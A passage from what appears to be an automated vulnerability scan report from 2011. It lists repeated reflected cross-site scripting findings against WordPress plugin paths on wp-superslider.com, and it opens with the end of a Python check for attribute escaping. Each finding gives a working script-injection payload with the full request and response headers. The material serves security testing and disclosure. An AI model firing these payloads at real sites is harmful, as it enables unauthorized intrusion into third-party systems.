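    print('script element present:', script_escapes_attribute(vuln))   # True
    print(fixed)
    print('script element present:', script_escapes_attribute(fixed))  # False
```

With the backslash-escaped rendering the tokenizer emits an a element whose href ends at the backslash, followed by a separate script element; with the HTML-encoded rendering it emits a single a element whose decoded href contains the entire payload as inert text. Running the same tokenizer over a real response body and checking whether the random marker ends up inside an attribute value or in a new element is a quick manual confirmation of a scanner finding of this kind.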
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b82fc"><script>alert(1)</script>dedd8e0a44b was submitted in the REST URL parameter 4. This input was echoed as b82fc\"><script>alert(1)</script>dedd8e0a44b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menub82fc"><script>alert(1)</script>dedd8e0a44b/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75ce"><script>alert(1)</script>115e8e28446 was submitted in the REST URL parameter 5. This input was echoed as e75ce\"><script>alert(1)</script>115e8e28446 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/jse75ce"><script>alert(1)</script>115e8e28446/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca307"><script>alert(1)</script>082b33d15a1 was submitted in the REST URL parameter 6. This input was echoed as ca307\"><script>alert(1)</script>082b33d15a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.jsca307"><script>alert(1)</script>082b33d15a1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972b5"><script>alert(1)</script>c3df305ca7c was submitted in the REST URL parameter 1. This input was echoed as 972b5\"><script>alert(1)</script>c3df305ca7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site972b5"><script>alert(1)</script>c3df305ca7c/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b3e"><script>alert(1)</script>54f1bceee82 was submitted in the REST URL parameter 2. This input was echoed as 60b3e\"><script>alert(1)</script>54f1bceee82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content60b3e"><script>alert(1)</script>54f1bceee82/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e84f7"><script>alert(1)</script>c0fd9f27655 was submitted in the REST URL parameter 3. This input was echoed as e84f7\"><script>alert(1)</script>c0fd9f27655 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginse84f7"><script>alert(1)</script>c0fd9f27655/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b31fa"><script>alert(1)</script>eb994eb117d was submitted in the REST URL parameter 4. This input was echoed as b31fa\"><script>alert(1)</script>eb994eb117d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menub31fa"><script>alert(1)</script>eb994eb117d/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ab5"><script>alert(1)</script>b3f3e43ffe4 was submitted in the REST URL parameter 5. This input was echoed as b3ab5\"><script>alert(1)</script>b3f3e43ffe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-datab3ab5"><script>alert(1)</script>b3f3e43ffe4/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674567; expires=Thu, 02-Feb-2012 19:22:47 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a4e7"><script>alert(1)</script>bc1d9122022 was submitted in the REST URL parameter 6. This input was echoed as 8a4e7\"><script>alert(1)</script>bc1d9122022 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider8a4e7"><script>alert(1)</script>bc1d9122022/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e26"><script>alert(1)</script>3ef7b7b12e4 was submitted in the REST URL parameter 7. This input was echoed as 93e26\"><script>alert(1)</script>3ef7b7b12e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu93e26"><script>alert(1)</script>3ef7b7b12e4/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93d9"><script>alert(1)</script>b1176fcac2 was submitted in the REST URL parameter 8. This input was echoed as e93d9\"><script>alert(1)</script>b1176fcac2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/defaulte93d9"><script>alert(1)</script>b1176fcac2/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674572+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d43c"><script>alert(1)</script>997d41182e2 was submitted in the REST URL parameter 9. This input was echoed as 5d43c\"><script>alert(1)</script>997d41182e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css5d43c"><script>alert(1)</script>997d41182e2 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b259"><script>alert(1)</script>cf11bf0924a was submitted in the REST URL parameter 1. This input was echoed as 7b259\"><script>alert(1)</script>cf11bf0924a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site7b259"><script>alert(1)</script>cf11bf0924a/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83ff"><script>alert(1)</script>15d9ca5fa65 was submitted in the REST URL parameter 2. This input was echoed as b83ff\"><script>alert(1)</script>15d9ca5fa65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb83ff"><script>alert(1)</script>15d9ca5fa65/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30690"><script>alert(1)</script>04ae898bca was submitted in the REST URL parameter 3. This input was echoed as 30690\"><script>alert(1)</script>04ae898bca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
